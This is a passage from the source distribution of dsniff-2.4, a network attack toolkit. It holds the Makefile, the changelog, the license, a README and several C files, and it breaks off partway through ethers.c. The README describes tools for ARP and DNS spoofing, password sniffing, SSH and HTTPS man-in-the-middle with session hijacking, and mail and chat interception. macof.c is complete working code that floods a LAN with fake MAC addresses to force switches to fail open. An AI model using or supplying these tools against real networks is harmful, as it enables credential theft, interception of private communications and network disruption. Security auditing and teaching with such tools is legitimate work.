dsniff-2.4/0000755000175000017500000000000010522531277012502 5ustar lucianolucianodsniff-2.4/Makefile.in0000600000175000017500000001160407254077242014546 0ustar lucianoluciano# # Makefile for dsniff # # Dug Song # # $Id: Makefile.in,v 1.42 2001/03/15 08:34:42 dugsong Exp $ srcdir = @srcdir@ VPATH = @srcdir@ install_prefix = prefix = @prefix@ exec_prefix = @exec_prefix@ libdir = @libdir@ sbindir = @sbindir@ mandir = @mandir@ CC = @CC@ CFLAGS = @CFLAGS@ -DDSNIFF_LIBDIR=\"$(libdir)/\" LDFLAGS = @LDFLAGS@ PCAPINC = @PCAPINC@ PCAPLIB = @PCAPLIB@ LNETINC = @LNETINC@ LNETLIB = @LNETLIB@ NIDSINC = @NIDSINC@ NIDSLIB = @NIDSLIB@ DBINC = @DBINC@ DBLIB = @DBLIB@ SSLINC = @SSLINC@ SSLLIB = @SSLLIB@ X11INC = @X_CFLAGS@ X11LIB = @X_LIBS@ @X_PRE_LIBS@ -lXmu -lX11 @X_EXTRA_LIBS@ INCS = -I. $(NIDSINC) $(PCAPINC) $(LNETINC) $(DBINC) $(SSLINC) $(X11INC) \ -I$(srcdir)/missing LIBS = @LIBS@ -L$(srcdir) -lmissing INSTALL = @INSTALL@ INSTALL_PROGRAM = @INSTALL_PROGRAM@ INSTALL_DATA = @INSTALL_DATA@ RANLIB = @RANLIB@ HDRS = asn1.h base64.h buf.h decode.h hex.h magic.h options.h \ pathnames.h pcaputil.h record.h rpc.h tcp_raw.h trigger.h \ version.h vroot.h SRCS = asn1.c base64.c buf.c hex.c magic.c mount.c pcaputil.c rpc.c \ tcp_raw.c trigger.c record.c dsniff.c decode.c decode_aim.c \ decode_citrix.c decode_cvs.c decode_ftp.c decode_hex.c \ decode_http.c decode_icq.c decode_imap.c decode_irc.c \ decode_ldap.c decode_mmxp.c decode_mountd.c decode_napster.c \ decode_nntp.c decode_oracle.c decode_ospf.c decode_pcanywhere.c \ decode_pop.c decode_portmap.c decode_postgresql.c decode_pptp.c \ decode_rip.c decode_rlogin.c decode_smb.c decode_smtp.c \ decode_sniffer.c decode_snmp.c decode_socks.c decode_tds.c \ decode_telnet.c decode_vrrp.c decode_yp.c decode_x11.c GEN = mount.h mount.c nfs_prot.h nfs_prot.c OBJS = $(SRCS:.c=.o) LIBOBJS = dummy.o @LIBOBJS@ PROGS = arpspoof dnsspoof dsniff filesnarf macof mailsnarf msgsnarf \ sshmitm sshow tcpkill tcpnice @TCPHIJACK@ urlsnarf webmitm @WEBSPY@ CONFIGS = dsniff.magic dsniff.services dnsspoof.hosts .c.o: $(CC) $(CFLAGS) $(INCS) -c $(srcdir)/$*.c all: libmissing.a $(PROGS) mount.c: mount.x rpcgen -h mount.x -o mount.h rpcgen -c mount.x -o mount.c nfs_prot.c: nfs_prot.x rpcgen -h nfs_prot.x -o nfs_prot.h rpcgen -c nfs_prot.x -o nfs_prot.c $(LIBOBJS): $(CC) $(CFLAGS) $(INCS) -c $(srcdir)/missing/$*.c libmissing.a: $(LIBOBJS) ar -cr $@ $(LIBOBJS) $(RANLIB) $@ dsniff: $(HDRS) $(SRCS) $(OBJS) $(CC) $(LDFLAGS) -o $@ $(OBJS) $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(DBLIB) $(SSLLIB) arpspoof: arpspoof.o arp.o $(CC) $(LDFLAGS) -o $@ arpspoof.o arp.o $(LIBS) $(PCAPLIB) $(LNETLIB) dnsspoof: dnsspoof.o pcaputil.o $(CC) $(LDFLAGS) -o $@ dnsspoof.o pcaputil.o $(LIBS) $(PCAPLIB) $(LNETLIB) filesnarf: nfs_prot.o filesnarf.o pcaputil.o rpc.o $(CC) $(LDFLAGS) -o $@ filesnarf.o nfs_prot.o pcaputil.o rpc.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) macof: macof.o $(CC) $(LDFLAGS) -o $@ macof.o $(LIBS) $(PCAPLIB) $(LNETLIB) mailsnarf: mailsnarf.o buf.o pcaputil.o $(CC) $(LDFLAGS) -o $@ mailsnarf.o buf.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) msgsnarf: msgsnarf.o buf.o pcaputil.o $(CC) $(LDFLAGS) -o $@ msgsnarf.o buf.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) sshmitm: sshmitm.o buf.o hex.o record.o ssh.o sshcrypto.o $(CC) $(LDFLAGS) -o $@ sshmitm.o buf.o hex.o record.o ssh.o sshcrypto.o $(LIBS) $(LNETLIB) $(DBLIB) $(SSLLIB) sshow: sshow.o pcaputil.o $(CC) $(LDFLAGS) -o $@ sshow.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) tcpkill: tcpkill.o pcaputil.o $(CC) $(LDFLAGS) -o $@ tcpkill.o pcaputil.o $(LIBS) $(PCAPLIB) $(LNETLIB) tcpnice: tcpnice.o pcaputil.o $(CC) $(LDFLAGS) -o $@ tcpnice.o pcaputil.o $(LIBS) $(PCAPLIB) $(LNETLIB) tcphijack: tcphijack.o pcaputil.o $(CC) $(LDFLAGS) -o $@ tcphijack.o pcaputil.o $(LIBS) $(PCAPLIB) $(LNETLIB) urlsnarf: urlsnarf.o base64.o buf.o pcaputil.o $(CC) $(LDFLAGS) -o $@ urlsnarf.o base64.o buf.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) webmitm: webmitm.o base64.o buf.o decode_http.o record.o $(CC) $(LDFLAGS) -o $@ webmitm.o base64.o buf.o decode_http.o record.o $(LIBS) $(LNETLIB) $(DBLIB) $(SSLLIB) webspy: webspy.o base64.o buf.o remote.o $(CC) $(LDFLAGS) -o $@ webspy.o base64.o buf.o remote.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(X11LIB) install: test -d $(install_prefix)$(sbindir) || \ $(INSTALL) -d $(install_prefix)$(sbindir) for file in $(PROGS); do \ $(INSTALL_PROGRAM) -m 755 $$file $(install_prefix)$(sbindir); \ done test -d $(install_prefix)$(libdir) || \ $(INSTALL) -d $(install_prefix)$(libdir) for file in $(CONFIGS); do \ $(INSTALL_DATA) $$file $(install_prefix)$(libdir); \ done test -d $(install_prefix)$(mandir)/man8 || \ $(INSTALL) -d $(install_prefix)$(mandir)/man8 for file in *.8; do \ $(INSTALL_DATA) $$file $(install_prefix)$(mandir)/man8; \ done clean: rm -f *.o *~ $(GEN) libmissing.a $(PROGS) webmitm.crt distclean: clean rm -f Makefile config.h config.cache config.log config.status # EOF dsniff-2.4/CHANGES0000600000175000017500000001450107255326373013476 0ustar lucianoluciano$Id: CHANGES,v 1.56 2001/03/19 06:53:47 dugsong Exp $ - Add support for ICMP frag-needed to tcpnice. - New sshow program: http://www.openwall.com/advisories/OW-003-ssh-traffic-analysis.txt - Add support for HTTP absolute URIs to webmitm and urlsnarf. - Add support for non-transparent proxying to webmitm, as requested by Juergen Schmidt . - Fix TDS decode for MSSQL 7.x, from Paul van Maaren . - Kludge around stupid Redhat Linux 6, 7 build env inconsistencies. - Fix dumb endianness bug in dnsspoof. v2.3 Sun Dec 17 11:35:38 EST 2000 - Add VRRP parsing to dsniff, from Eric Jackson . - Require pcap filter argument for tcpkill, tcpnice. - Add Microsoft PPTP MS-CHAP (v1, v2) parsing to dsniff, based on anger.c by Aleph One . - Fix pcAnywhere 7, 9.x parsing in dsniff. - Add -t trigger[,...] flag to dsniff, to specify individual triggers on the command line. - Convert most everything to use new buf interface. - New programs: dnsspoof, msgsnarf, sshmitm, webmitm. - Fix inverted regex matching in *snarf programs. - Consistent arpspoof, macof, tcpnice, tcpkill output. - Rename arpredirect to arpspoof (maintain consistent *sniff, *snarf, *spoof, *spy nomenclature). - Consistent pcap filter argument to dsniff, *snarf programs. - Add trigger for Checkpoint Firewall-1 Session Authentication Agent (261/tcp), as suggested by Joe Segreti . - Add SMTP parsing to dsniff, as requested by Denis Ducamp . - Add rexec and RPC ypserv parsing to dsniff, as requested by Oliver Friedrichs . - Add HTTP proxy auth parsing back to dsniff, it got lost in the shuffle. Reported by Denis Ducamp . - Add NNTPv2 and other AUTHINFO extensions to dsniff. v2.2 Wed Jun 14 00:58:37 EDT 2000 - Rewrite HTTP decoding in dsniff, adding support for QUERY_STRING and x-www-form-urlencoded parsing (various CGI authentication schemes). - Alpha support (libnids and libnet still need to be fixed). - Fix arp discovery in arpredirect on Linux. - Add -m flag to enable automatic protocol detection in dsniff, based on the classic file(1) command by Ian Darwin. - Add TDS (Sybase, Microsoft SQL Server) parsing to dsniff. - Clean up RPC decodes, TCP half-duplex reassembly in dsniff. - New filesnarf program. - Add regular expression matching to mailsnarf. - Add POP support to mailsnarf. v2.1 Thu May 18 16:18:35 EDT 2000 - Add -c flag to specify half-duplex TCP stream reassembly in dsniff (better support for sniffing off switched ports using arpredirect). - Fix > 24 char Meeting Maker passwd parsing in dsniff. - Fix OSPF parsing in dsniff (don't truncate first two chars), as reported by Felix Contreras . - Fix webspy URL ignoring, as reported by Interrupt . v2.0 Tue May 16 13:11:22 EDT 2000 - Major dsniff rewrite, since ppl are actually reading this code. :-) - Add configurable decode triggers to dsniff. - Add dsniff debugging functions, split out decode routines. - Add yppasswd parsing to dsniff. - Rewrite dsniff RPC framework, portmap and NFS mountd decodes. - Make dsniff savefile format portable. - Remove findgw - to be subsumed by dsquat package. - Add PostgreSQL parsing to dsniff. - Add Meeting Maker parsing to dsniff. - Add poppass parsing to dsniff. - Add RIP, OSPF parsing to dsniff. - Fix RSET handling in mailsnarf (from Martin Fredriksson ). v1.8 Sun Apr 9 23:59:46 EDT 2000 - Add SOCKS parsing to dsniff. - Add pcAnywhere parsing to dsniff. - Fix SMB parsing in dsniff. - Add IRC parsing to dsniff. - Add NAI Sniffer parsing to dsniff (from Anonymous). v1.7 Mon Mar 27 16:19:32 EST 2000 - Add -s flag to specify snaplen to dsniff. - Support systems without or dirname(). - Add Microsoft SMB parsing to dsniff. - Add Citrix ICA parsing to dsniff. - Add LDAP parsing to dsniff. - Fix Berkeley mbox format again (\n, not \r\n). - Fix null URI dereference in urlsnarf. - Add Oracle SQL*Net (v2, Net8) parsing to dsniff. - Catch data left on connection close in mailsnarf, urlsnarf, webspy. v1.6 Sun Mar 12 16:25:09 EST 2000 - Support non-glibc Linux systems missing ether_ntoa(). - Unique HTTP auth info by URI dirname in dsniff. - Add Napster parsing to dsniff. - Don't rely on /etc/services for dsniff. - Add AIM, ICQ (v2, v5) parsing to dsniff. - Add CVS pserver parsing to dsniff. - Skip IMAP command tag in dsniff. v1.5 Tue Feb 15 23:22:25 EST 2000 - Fix HTTP proxy support in urlsnarf (from ). - Fix HTTP proxy support in dsniff (from ). - Proper manpages for all programs. - Strip binary nulls in telnet input, in dsniff (doh!). v1.4 Thu Jan 27 12:08:41 EST 2000 - Add verbose flag (-v) to tcpkill, tcpnice. - Add NNTP parsing to dsniff (from Felix von Leitner ). - Fix mailsniff mbox formatting of ^From in message body. - Add HTTP proxy support in dsniff, urlsnarf, webspy. - Fix getopt() usage to be POSIX compliant (s/EOF/-1/). - New tcpnice program. v1.3 Fri Jan 21 02:47:37 EST 2000 - Ported to Solaris (along with libnids :-) - Add Berkeley db(3) output file format to dsniff, as well as restricting logging to unique auth info. - New tcpkill program. - New lame dsniff(8) manpage. - Add DNS lookups (and -n flag to disable) in dsniff, urlsnarf. - Add HTTP Basic Authentication, Referer, User-Agent logging to urlsnarf. - Improve RPC message parsing in dsniff. - Improve SMTP parsing in mailsnarf. - Improve HTTP 1.x parsing in dsniff, urlsnarf, webspy. - Fix IMAP, Rlogin, Telnet option parsing in dsniff (broke them in 1.2). - Add X11 MIT-MAGIC-COOKIE parsing to dsniff. - Don't forget to decode POP SASL username in dsniff (doh!). v1.2 Sat Jan 8 22:36:42 EST 2000 - Ported to FreeBSD (but not tested!). - Add GNU autoconf support. - Add NFS mount parsing / RPC framework to dsniff. - Add -i flag to specify interface to use with dsniff, mailsnarf, urlsnarf, and webspy. v1.1 Tue Dec 21 10:31:42 EST 1999 (re-released) - Make macof loop repeatedly if missing -n argument. - Remove dependencies on unreleased version of libnids. - Make arpredirect restore original ARP mapping on exit. - Ported to Linux & Solaris (but not tested!). v1.0 Fri Dec 17 02:42:42 EST 1999 - First public release. dsniff-2.4/LICENSE0000600000175000017500000000267207204257537013515 0ustar lucianoluciano Copyright (c) 1999, 2000 Dug Song All rights reserved, all wrongs reversed. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. The name of author may not be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. dsniff-2.4/asn1.c0000600000175000017500000000146707254077072013516 0ustar lucianoluciano/* * asn1.c * * Copyright (c) 2000 Dug Song * * $Id: asn1.c,v 1.4 2001/03/15 08:32:58 dugsong Exp $ */ #include "config.h" #include #include #include #include "buf.h" #include "asn1.h" int asn1_type(buf_t buf) { u_char c; if (buf_get(buf, &c, 1) != 1) return (-1); return (c & 0x1f); } int asn1_len(buf_t buf) { u_char *p, c; int num; if (buf_get(buf, &c, 1) != 1) return (-1); if (c >= 128) { c &= ~128; p = buf_ptr(buf); if (buf_skip(buf, c) < 0) return (-1); switch (c) { case 1: num = *p; break; case 2: GETSHORT(num, p); break; case 3: p--; GETLONG(num, p); num &= 0xfff; break; case 4: GETLONG(num, p); break; default: return (-1); } } else num = c; return (num); } dsniff-2.4/README0000600000175000017500000000755407254573512013373 0ustar lucianoluciano dsniff-2.3 ---------- i wrote these tools with honest intentions - to audit my own network, and to demonstrate the insecurity of cleartext / weakly-encrypted network protocols and ad-hoc PKI. please do not abuse this software. these programs require: Berkeley DB - http://www.sleepycat.com/ OpenSSL - http://www.openssl.org/ libpcap - http://www.tcpdump.org/ libnids - http://www.packetfactory.net/Projects/Libnids/ libnet - http://www.packetfactory.net/Projects/Libnet/ built and tested on OpenBSD, Linux, and Solaris. YMMV. what's here: arpspoof redirect packets from a target host (or all hosts) on the LAN intended for another local host by forging ARP replies. this is an extremely effective way of sniffing traffic on a switch. kernel IP forwarding (or a userland program which accomplishes the same, e.g. fragrouter :-) must be turned on ahead of time. dnsspoof forge replies to arbitrary DNS address / pointer queries on the LAN. this is useful in bypassing hostname-based access controls, or in implementing a variety of man-in-the-middle attacks (HTTP, HTTPS, SSH, Kerberos, etc). dsniff password sniffer. handles FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL*Net, Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol, only saving the interesting bits, and uses Berkeley DB as its output file format, only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well). filesnarf saves selected files sniffed from NFS traffic in the current working directory. macof flood the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing). a straight C port of the original Perl Net::RawIP macof program. mailsnarf a fast and easy way to violate the Electronic Communications Privacy Act of 1986 (18 USC 2701-2711), be careful. outputs selected messages sniffed from SMTP and POP traffic in Berkeley mbox format, suitable for offline browsing with your favorite mail reader (mail -f, pine, etc.). msgsnarf record selected messages from sniffed AOL Instant Messenger, ICQ 2000, IRC, and Yahoo! Messenger chat sessions. sshmitm SSH monkey-in-the-middle. proxies and sniffs SSH traffic redirected by dnsspoof(8), capturing SSH password logins, and optionally hijacking interactive sessions. only SSH protocol version 1 is (or ever will be) supported - this program is far too evil already. sshow SSH traffic analysis tool. analyzes encrypted SSH-1 and SSH-2 traffic, identifying authentication attempts, the lengths of passwords entered in interactive sessions, and command line lengths. tcpkill kills specified in-progress TCP connections (useful for libnids-based applications which require a full TCP 3-whs for TCB creation). tcpnice slow down specified TCP connections via "active" traffic shaping. forges tiny TCP window advertisements, and optionally ICMP source quench replies. urlsnarf output selected URLs sniffed from HTTP traffic in CLF (Common Log Format, used by almost all web servers), suitable for offline post-processing with your favorite web log analysis tool (analog, wwwstat, etc.). webmitm HTTP / HTTPS monkey-in-the-middle. transparently proxies and sniffs web traffic redirected by dnsspoof(8), capturing most "secure" SSL-encrypted webmail logins and form submissions. webspy sends URLs sniffed from a client to your local Netscape browser for display, updated in real-time (as the target surfs, your browser surfs along with them, automagically). a fun party trick. :-) -d. --- http://www.monkey.org/~dugsong/ dsniff-2.4/macof.c0000600000175000017500000000643207254077100013726 0ustar lucianoluciano/* * macof.c * * C port of macof-1.1 from the Perl Net::RawIP distribution. * Tests network devices by flooding local network with MAC-addresses. * * Perl macof originally written by Ian Vitek . * * Copyright (c) 1999 Dug Song * * $Id: macof.c,v 1.15 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include "version.h" extern char *ether_ntoa(struct ether_addr *); extern struct ether_addr *ether_aton(char *); in_addr_t Src = 0; in_addr_t Dst = 0; u_char *Tha = NULL; u_short Dport = 0; u_short Sport = 0; char *Intf = NULL; int Repeat = -1; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: macof [-s src] [-d dst] [-e tha] [-x sport] [-y dport]" "\n [-i interface] [-n times]\n"); exit(1); } static void gen_mac(u_char *mac) { *((in_addr_t *)mac) = libnet_get_prand(PRu32); *((u_short *)(mac + 4)) = libnet_get_prand(PRu16); } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c, i; struct libnet_link_int *llif; char ebuf[PCAP_ERRBUF_SIZE]; u_char sha[ETHER_ADDR_LEN], tha[ETHER_ADDR_LEN]; in_addr_t src, dst; u_short sport, dport; u_int32_t seq; u_char pkt[ETH_H + IP_H + TCP_H]; while ((c = getopt(argc, argv, "vs:d:e:x:y:i:n:h?V")) != -1) { switch (c) { case 'v': break; case 's': Src = libnet_name_resolve(optarg, 0); break; case 'd': Dst = libnet_name_resolve(optarg, 0); break; case 'e': Tha = (u_char *)ether_aton(optarg); break; case 'x': Sport = atoi(optarg); break; case 'y': Dport = atoi(optarg); break; case 'i': Intf = optarg; break; case 'n': Repeat = atoi(optarg); break; default: usage(); } } argc -= optind; argv += optind; if (argc != 0) usage(); if (!Intf && (Intf = pcap_lookupdev(ebuf)) == NULL) errx(1, "%s", ebuf); if ((llif = libnet_open_link_interface(Intf, ebuf)) == 0) errx(1, "%s", ebuf); libnet_seed_prand(); for (i = 0; i != Repeat; i++) { gen_mac(sha); if (Tha == NULL) gen_mac(tha); else memcpy(tha, Tha, sizeof(tha)); if (Src != 0) src = Src; else src = libnet_get_prand(PRu32); if (Dst != 0) dst = Dst; else dst = libnet_get_prand(PRu32); if (Sport != 0) sport = Sport; else sport = libnet_get_prand(PRu16); if (Dport != 0) dport = Dport; else dport = libnet_get_prand(PRu16); seq = libnet_get_prand(PRu32); libnet_build_ethernet(tha, sha, ETHERTYPE_IP, NULL, 0, pkt); libnet_build_ip(TCP_H, 0, libnet_get_prand(PRu16), 0, 64, IPPROTO_TCP, src, dst, NULL, 0, pkt + ETH_H); libnet_build_tcp(sport, dport, seq, 0, TH_SYN, 512, 0, NULL, 0, pkt + ETH_H + IP_H); libnet_do_checksum(pkt + ETH_H, IPPROTO_IP, IP_H); libnet_do_checksum(pkt + ETH_H, IPPROTO_TCP, TCP_H); if (libnet_write_link_layer(llif, Intf, pkt, sizeof(pkt)) < 0) errx(1, "write"); fprintf(stderr, "%s ", ether_ntoa((struct ether_addr *)sha)); fprintf(stderr, "%s %s.%d > %s.%d: S %u:%u(0) win 512\n", ether_ntoa((struct ether_addr *)tha), libnet_host_lookup(Src, 0), sport, libnet_host_lookup(Dst, 0), dport, seq, seq); } exit(0); } dsniff-2.4/missing/0000755000175000017500000000000010522531320014140 5ustar lucianolucianodsniff-2.4/missing/strlcat.c0000600000175000017500000000500207204257537015767 0ustar lucianoluciano/* $Id: strlcat.c,v 1.1 2000/04/08 20:50:28 dugsong Exp $ */ /* $OpenBSD: strlcat.c,v 1.1 1998/07/01 01:29:45 millert Exp $ */ /* * Copyright (c) 1998 Todd C. Miller * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #if defined(LIBC_SCCS) && !defined(lint) static char *rcsid = "$OpenBSD: strlcat.c,v 1.1 1998/07/01 01:29:45 millert Exp $"; #endif /* LIBC_SCCS and not lint */ #include #include /* * Appends src to string dst of size siz (unlike strncat, siz is the * full size of dst, not space left). At most siz-1 characters * will be copied. Always NUL terminates (unless siz == 0). * Returns strlen(src); if retval >= siz, truncation occurred. */ size_t strlcat(dst, src, siz) char *dst; const char *src; size_t siz; { register char *d = dst; register const char *s = src; register size_t n = siz; size_t dlen; /* Find the end of dst and adjust bytes left */ while (*d != '\0' && n != 0) d++; dlen = d - dst; n -= dlen; if (n == 0) return(dlen + strlen(s)); while (*s != '\0') { if (n != 1) { *d++ = *s; n--; } s++; } *d = '\0'; return(dlen + (s - src)); /* count does not include NUL */ } dsniff-2.4/missing/strlcpy.c0000600000175000017500000000445607204257540016021 0ustar lucianoluciano/* $Id: strlcpy.c,v 1.1 2000/04/08 20:50:28 dugsong Exp $ */ /* $OpenBSD: strlcpy.c,v 1.2 1998/11/06 04:33:16 wvdputte Exp $ */ /* * Copyright (c) 1998 Todd C. Miller * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #if defined(LIBC_SCCS) && !defined(lint) static char *rcsid = "$OpenBSD: strlcpy.c,v 1.2 1998/11/06 04:33:16 wvdputte Exp $"; #endif /* LIBC_SCCS and not lint */ #include #include /* * Copy src to string dst of size siz. At most siz-1 characters * will be copied. Always NUL terminates (unless siz == 0). * Returns strlen(src); if retval >= siz, truncation occurred. */ size_t strlcpy(dst, src, siz) char *dst; const char *src; size_t siz; { register char *d = dst; register const char *s = src; register size_t n = siz; if (n == 0) return(strlen(s)); while (*s != '\0') { if (n != 1) { *d++ = *s; n--; } s++; } *d = '\0'; return(s - src); /* count does not include NUL */ } dsniff-2.4/missing/dirname.c0000600000175000017500000000470107204257540015731 0ustar lucianoluciano/* $Id: dirname.c,v 1.1 2000/04/08 20:50:28 dugsong Exp $ */ /* $OpenBSD: dirname.c,v 1.4 1999/05/30 17:10:30 espie Exp $ */ /* * Copyright (c) 1997 Todd C. Miller * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include #include #include char * dirname(path) const char *path; { static char bname[MAXPATHLEN]; register const char *endp; /* Empty or NULL string gets treated as "." */ if (path == NULL || *path == '\0') { (void)strcpy(bname, "."); return(bname); } /* Strip trailing slashes */ endp = path + strlen(path) - 1; while (endp > path && *endp == '/') endp--; /* Find the start of the dir */ while (endp > path && *endp != '/') endp--; /* Either the dir is "/" or there are no slashes */ if (endp == path) { (void)strcpy(bname, *endp == '/' ? "/" : "."); return(bname); } else { do { endp--; } while (endp > path && *endp == '/'); } if (endp - path + 1 > sizeof(bname)) { errno = ENAMETOOLONG; return(NULL); } (void)strncpy(bname, path, endp - path + 1); bname[endp - path + 1] = '\0'; return(bname); } dsniff-2.4/missing/ethers.c0000600000175000017500000000620707204257540015607 0ustar lucianoluciano/* $Id: ethers.c,v 1.1 2000/04/08 20:50:28 dugsong Exp $ */ /* $OpenBSD: ethers.c,v 1.10 1998/11/18 23:28:54 deraadt Exp $ */ /* * Copyright (c) 1998 Todd C. Miller * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ /* * ethers(3) a la Sun. * Originally Written by Roland McGrath 10/14/93. * Substantially 